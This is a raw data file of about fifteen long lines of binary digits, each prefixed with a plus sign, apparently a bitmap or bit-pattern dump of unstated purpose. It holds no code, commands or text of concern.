+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000001011001100000111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000011110101011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000001000011100100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011110001011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100000000000000000000111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000001101010010001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111001100010001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111001111010000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111010100110011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000001000110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001100000110011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 